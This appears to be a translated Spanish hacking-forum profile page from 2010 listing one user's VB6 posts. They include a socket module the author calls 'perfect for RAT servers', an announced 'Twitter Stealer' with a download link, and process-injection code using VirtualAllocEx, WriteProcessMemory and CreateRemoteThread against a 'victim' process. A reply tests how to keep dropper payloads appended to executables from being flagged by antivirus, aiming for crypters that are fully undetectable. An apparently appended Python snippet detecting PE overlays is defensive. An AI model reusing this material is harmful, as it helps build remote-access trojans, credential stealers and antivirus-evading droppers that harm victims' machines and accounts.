Programming / Visual Basic Programming / [SRC] Sockets - VB6

On: 15 July 2010, 06:30 am
Socket module:

Option Explicit

Private Declare Function socket Lib "WSOCK32" (ByVal af As Long, ByVal s_type As Long, ByVal protocol As Long) As Long
Private Declare Function closesocket Lib "WSOCK32" (ByVal s As Long) As Long
Private Declare Function connect Lib "WSOCK32" (ByVal s As Long, addr As SOCKADDR, ByVal NameLen As Long) As Long
Private Declare Function send Lib "WSOCK32" (ByVal s As Long, Buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
Private Declare Function recv Lib "WSOCK32" (ByVal s As Long, Buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
Public Declare Function inet_addr Lib "WSOCK32" (ByVal cp As String) As Long
Private Declare Function WSAStartup Lib "WSOCK32" (ByVal wVR As Long, lpWSAD As Long) As Long
Private Declare Function WSACleanup Lib "WSOCK32" () As Long
Private Declare Function WSAAsyncSelect Lib "WSOCK32" (ByVal s As Long, ByVal hWnd As Long, ByVal wMsg As Long, ByVal lEvent As Long) As Long

Private Declare Function CreateWindowExA Lib "USER32" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
Private Declare Function RegisterClassExA Lib "USER32" (pcWndClassEx As WNDCLASSEX) As Integer
Private Declare Function DefWindowProcA Lib "USER32" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Private Type WNDCLASSEX
    cbSize As Long
    style As Long
    lpfnWndProc As Long
    cbClsExtra As Long
    cbWndExtra As Long
    hInstance As Long
    hIcon As Long
    hCursor As Long
    hbrBackground As Long
    lpszMenuName As String
    lpszClassName As String
    hIconSm As Long
End Type

Private Type SOCKADDR
    sin_family As Integer
    sin_port As Integer
    sin_addr As Long
    sin_zero As String * 8
End Type

Private Const AF_INET = 2
Private Const PF_INET = 2
Private Const FD_READ = &H1&
Private Const FD_WRITE = &H2&
Private Const FD_CONNECT = &H10&
Private Const FD_CLOSE = &H20&
Private Const SOCK_STREAM = 1
Private Const IPPROTO_TCP = 6
Private Const WINSOCK_MESSAGE = 1025

Private wHwnd As Long

' Host-to-network byte order for the port (by Karcrack)
Public Function htons(ByVal lPort As Long) As Integer
    htons = ((((lPort And &HFF000000) \ &H1000000) And &HFF&) Or ((lPort And &HFF0000) \ &H100&) Or ((lPort And &HFF00&) * &H100&) Or ((lPort And &H7F&) * &H1000000) Or (IIf((lPort And &H80&), &H80000000, &H0)) And &HFFFF0000) \ &H10000
End Function

'--------
' Window procedure of the hidden window: receives the WSAAsyncSelect notifications
Public Function ProcessMessage(ByVal hWnd As Long, ByVal lMessage As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    If lMessage = WINSOCK_MESSAGE Then
        Dim bBuffer(1 To 1024) As Byte
        Select Case lParam
            Case FD_CONNECT: Call WsSendData(wParam, StrConv("AAAAAAAAAA", vbFromUnicode))
            Case FD_WRITE:
            Case FD_READ: Call recv(wParam, bBuffer(1), 1024, 0)
                          MsgBox StrConv(bBuffer, vbUnicode)
            Case FD_CLOSE: 'Jmp connect Routine
        End Select
        Exit Function
    End If
    ProcessMessage = DefWindowProcA(hWnd, lMessage, wParam, lParam)
End Function
'--------

' Registers the window class, creates the hidden message window and starts Winsock
Public Function WsInitialize(ByVal MyWndProc As Long, ByVal szSocketName As String) As Boolean
    Dim WNDC As WNDCLASSEX
    If wHwnd = 0 Then
        WNDC.cbSize = LenB(WNDC)
        WNDC.lpfnWndProc = MyWndProc
        WNDC.hInstance = App.hInstance
        WNDC.lpszClassName = szSocketName
        Call RegisterClassExA(WNDC) '0: Exit Function
        wHwnd = CreateWindowExA(0&, szSocketName, "", 0&, 0&, 0&, 0&, 0&, 0&, 0&, App.hInstance, 0&) '0: Call UnregisterClass(szSocketName, App.hInstance)
    End If
    Call WSAStartup(&H101, 0&)
    WsInitialize = True
End Function

Public Sub WsTerminate()
    Call WSACleanup
End Sub

Public Function WsConnect(lRemoteHost As String, lPort As Long) As Long
    Dim SockData As SOCKADDR
    Dim hSocket As Long
    Dim lWsMsg As Long
    SockData.sin_family = AF_INET
    SockData.sin_port = htons(lPort)
    'If SockData.sin_port = INVALID_SOCKET Then Exit Function
    SockData.sin_addr = inet_addr(lRemoteHost)
    'If SockData.sin_addr = INADDR_NONE Then Exit Function
    hSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)
    'If hSocket < 0 Then Exit Function
    Call connect(hSocket, SockData, 16)
    ' If hSocket Then WsClose Exit Function
    If WSAAsyncSelect(hSocket, wHwnd, ByVal WINSOCK_MESSAGE, ByVal FD_READ Or FD_WRITE Or FD_CONNECT Or FD_CLOSE) Then
        lWsMsg = FD_CLOSE
    Else
        lWsMsg = FD_CONNECT
    End If
    Call ProcessMessage(0, WINSOCK_MESSAGE, hSocket, FD_CONNECT): WsConnect = hSocket
End Function

Public Function WsSendData(ByVal SocketIndex As Long, bMessage() As Byte) As Long
    If UBound(bMessage) > -1 Then
        WsSendData = send(SocketIndex, bMessage(0), (UBound(bMessage) - LBound(bMessage) + 1), 0)
    End If
End Function

Usage:

Private Sub Main()
    If WsInitialize(AddressOf ProcessMessage, "Server") Then
        If WsConnect("127.0.0.1", 7777) Then
            Do
                DoEvents
            Loop
        End If
    End If
End Sub

Nothing fancy, it's a tiny version of what is normally used (OCX, SocketPlus, SocketMaster, etc.). It only serves to send/receive data, perfect for RAT servers and other apps... The ProcessMessage function is the one that processes the messages, and you'll have to modify it according to your app. I'm sure it can be cleaned up even more, getting rid of the ***** of creating a class and a window, but I can't think of a neater replacement. The htons function is by Karcrack. Oh, Karcrack, I'm sure you could write a replacement for inet_addr@WSOCK32.DLL; I tried, but I didn't understand the logic of what that lovely API does. I hope the code is useful to you. Regards, and congratulations on the Cup to the people of Spain, from Uruguay.
Computer Security / Malware Analysis and Design / Re: [SRC] Twitter Stealer

On: 15 July 2010, 06:09 am
Haha, yes, the plugin part can be improved a lot; if I do a v2 of this I'll include the plugin system from the RAT that I think I'll never finish for lack of motivation. I don't like the DLL thing in VB6 much for now, simply because of the way they are executed after being injected... I'd love to see VB6 code that calls a library's DllSubMain through a remote CallWindowProcW... But I couldn't get it done, and I don't see any SRC on the net showing how to call an API in a remote process passing it 2 or more parameters using CreateRemoteThread... I found the same thing in C/C++ but I'm such a noob that I can't VB6-ize it: http://www.rohitab.com/discuss/index.php?showtopic=31453 It would be great if someone managed to write it in VB6 and shared it. Regards
Computer Security / Malware Analysis and Design / [SRC] Twitter Stealer

On: 13 July 2010, 19:26 pm
Hi! I made this a long time ago and left it lying around; since it's no use sitting on my HD, I'm publishing it, maybe one of you can put it to better use =). As you'll see it's plugin-based; I didn't make any functional ones, but the example plugin is there so you can see how the data has to be handed over for the client to sort everything correctly =) The code is quite simple to understand, I hope it's of some use to you, and well, nothing more to say, Regards! http://www.box.net/shared/o2cod7gqjf
Programming / Visual Basic Programming / Problem passing parameters to a remote call :P

On: 9 June 2010, 05:47 am
Hi, people of the world. Many of you probably don't know me, since I'm the little Uruguayan Indian. I know I don't participate in the forum, and I shouldn't be asking for help, but I'm working on something, and Mr. Karcrack, who used to give me a hand when I had little problems and always showed up with the solution, is very busy, so I come to ask you for help with this small code I made from a C source for injecting a library into a remote process. It tries to call a remote API, which works, but the problem is when passing it the parameters; looking through the CallApiByName versions around the net, I tried to do it but FAIL FAIL lol

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Const MEM_COMMIT = &H1000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_READWRITE = &H4
Private Const INFINITE = &HFFFFFFFF

Public Function ExecuteDll(lPid As Long) As Boolean
    Dim hVictim As Long
    Dim hInject As Long
    Dim lParamAddress As Long
    Dim lStartAddress As Long
    Dim bB() As Byte
    Dim sTmp As String

    hVictim = OpenProcess(PROCESS_ALL_ACCESS, 0, lPid): If hVictim = 0 Then Exit Function
    If hVictim = 0 Then: GoTo Error
    '===
    sTmp = "68" & GetLng(0) & _
           "68" & GetLng(StrPtr("HOLA")) & _
           "68" & GetLng(StrPtr("HOLA")) & _
           "68" & GetLng(0) & "68"
    Call PutThunk(sTmp, bB)
    '===
    lStartAddress = GetProcAddress(GetModuleHandle("USER32"), "MessageBoxA"): If lStartAddress = 0 Then GoTo Error
    lParamAddress = VirtualAllocEx(hVictim, 0&, UBound(bB) + 1, MEM_COMMIT, PAGE_READWRITE): If lParamAddress = 0 Then GoTo Error
    Call WriteProcessMemory(hVictim, lParamAddress, ByVal VarPtr(bB(0)), UBound(bB) + 1, ByVal 0&)
    '===
    hInject = CreateRemoteThread(hVictim, ByVal 0&, 0&, ByVal lStartAddress, lParamAddress, 0, ByVal 0&)
    If hInject = 0 Then: GoTo Error
    '===
    Call WaitForSingleObject(hInject, INFINITE)
    Call CloseHandle(hVictim)
    Call CloseHandle(hInject)

    ExecuteDll = True
    Exit Function

Error:
    Call CloseHandle(hInject)
    Call CloseHandle(hVictim)

    ExecuteDll = False
End Function

Private Function GetLng(ByVal lLng As Long) As String
    Dim lTMP As Long
    lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
    If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
    GetLng = String$(8 - Len(Hex$(lTMP)), "0") & Hex$(lTMP)
End Function

Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
    Dim i As Long
    ReDim bvRet(0)
    For i = 0 To Len(sThunk) - 1 Step 2
        bvRet(i / 2) = CByte("&H" & Mid$(sThunk, i + 1, 2))
        ReDim Preserve bvRet(UBound(bvRet) + 1)
    Next i
    ReDim Preserve bvRet(UBound(bvRet) - 1)
End Sub

Sub Main()
    ExecuteDll 7756, 0
End Sub

I hope someone has a bit of time to correct the parameters part in the source, because I keep thinking about it but can't solve it, and I'm working on something very interesting that I'd like to pull off, and for that I need this working. Thanks, and greetings from little Uruguay to all the coders out there.
Programming / Visual Basic Programming / Re: Generic Server Editor Class [SRC]

On: 13 July 2009, 17:28 pm
So it's as I say: the PropertyBag has nothing to do with AV; the issue is that the stub and the encryption method aren't FUD.

The problem isn't the encryption method or the stub, at least with Avira. I did a couple of tests, and Avira detects a file no matter what if it has a large amount of EOF data. Doing it with "short" texts (e.g. "aaaaaaaaaaaaaa") there's no problem, but there is when "long" texts are added (e.g. String(20000, "b")). The same happens with the resources "method":

Option Explicit

Private Declare Function BeginUpdateResource Lib "kernel32" Alias "BeginUpdateResourceA" (ByVal pFileName As String, ByVal bDeleteExistingResources As Long) As Long
Private Declare Function UpdateResource Lib "kernel32" Alias "UpdateResourceA" (ByVal hUpdate As Long, ByVal lpType As String, ByVal lpName As Long, ByVal wLanguage As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function EndUpdateResource Lib "kernel32" Alias "EndUpdateResourceA" (ByVal hUpdate As Long, ByVal fDiscard As Long) As Long

Private Function AgregarRecurso(Ruta As String, Datos As String)
    Dim hRes As Long, i As Integer
    Dim myStr() As Byte, b() As Byte
    myStr = StrConv(Datos, vbFromUnicode)
    hRes = BeginUpdateResource(Ruta, False)
    UpdateResource hRes, "CUSTOM", 101, 0, myStr(0), Len(Datos)
    EndUpdateResource hRes, False
End Function

Try: Call AgregarRecurso("c:\ss.exe", String(20000, "b")) and you'll see it is also detected as Dropper.

=============

Leaving that little problem aside, it's an excellent contribution; at least for me it's quite useful so I don't have to keep using the "Append" method, which makes you write more, unlike this one, which is very convenient. PS: Sorry for reviving the thread. Regards
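The behaviour described above (a file with a large amount of EOF data gets flagged as a dropper) is a common overlay heuristic. The following is an added example, not code from the thread: it measures the overlay of a PE file (bytes past the end of the last section) and flags it above an assumed threshold, using a constructed one-section PE skeleton as sample input.

```python
import struct

def pe_overlay_size(data: bytes) -> int:
    """Bytes appended past the end of the last section (the 'EOF data' / overlay)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    # COFF header: NumberOfSections at +6, SizeOfOptionalHeader at +20 (relative to e_lfanew)
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    sec_table = e_lfanew + 24 + opt_size
    end_of_sections = 0
    for i in range(num_sections):
        # Section header is 40 bytes; SizeOfRawData at +16, PointerToRawData at +20
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_table + i * 40 + 16)
        end_of_sections = max(end_of_sections, raw_ptr + raw_size)
    return max(0, len(data) - end_of_sections)

def looks_like_dropper(data: bytes, threshold: int = 16 * 1024) -> bool:
    """Flag a file whose overlay is large; the 16 KiB threshold is an assumed value."""
    return pe_overlay_size(data) > threshold

def build_minimal_pe(overlay: bytes) -> bytes:
    """Constructed sample: a one-section PE32 skeleton with `overlay` appended after the last section."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: PE header right after the DOS header
    opt = bytes(0xE0)                                 # zeroed PE32 optional header (not parsed above)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000,
                          0x200, 0x400, 0, 0, 0, 0, 0x60000020)  # raw data: 0x200 bytes at file offset 0x400
    headers = (bytes(dos) + b"PE\0\0" + coff + opt + section).ljust(0x400, b"\0")
    return headers + b"\x90" * 0x200 + overlay

if __name__ == "__main__":
    # Mirrors the two cases from the post: a 14-byte string and String(20000, "b")
    for label, payload in (("short", b"a" * 14), ("long", b"b" * 20000)):
        sample = build_minimal_pe(payload)
        print(label, pe_overlay_size(sample), looks_like_dropper(sample))
```

Real scanners weigh the overlay together with entropy and other signals; this only reproduces the size-based part the post observed.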